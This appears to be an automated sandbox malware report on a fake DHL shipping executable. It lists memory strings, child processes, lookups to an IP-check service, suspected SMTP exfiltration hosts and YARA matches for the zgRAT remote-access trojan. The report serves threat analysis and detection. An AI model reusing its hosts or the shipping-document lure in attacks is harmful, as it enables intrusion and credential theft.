                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D72000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A029000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023CC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.thanhphoung-vn.com
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417ED8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417DA1000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_error8
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/installer/?product=
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/8
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417EBF000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
                  Source: explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49697 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49701 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: DHL_Shipping_Document2.exe
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C29A30_2_00007FFBAD3C29A3
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C0C000_2_00007FFBAD3C0C00
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DC97815_2_022DC978
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DA9B815_2_022DA9B8
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022D9DA015_2_022D9DA0
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022D02BF15_2_022D02BF
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DA0E815_2_022DA0E8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD400CAA17_2_00007FFBAD400CAA
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD403EDF17_2_00007FFBAD403EDF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD40BDE817_2_00007FFBAD40BDE8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AA0E819_2_021AA0E8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AC97819_2_021AC978
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AA9B819_2_021AA9B8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021A9DA019_2_021A9DA0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021A07A219_2_021A07A2
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA9B823_2_00DFA9B8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFC97823_2_00DFC978
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF5AD023_2_00DF5AD0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF9DA023_2_00DF9DA0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA0DC23_2_00DFA0DC
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA0E823_2_00DFA0E8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF5A8023_2_00DF5A80
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF7A4423_2_00DF7A44
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF3B4823_2_00DF3B48
                  Source: DHL_Shipping_Document2.exe, 00000000.00000000.255501089.0000019909E32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDHL Shipping Document2.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFmdxqenedkdyqyti.dll" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BB02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.390559945.0000019909F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
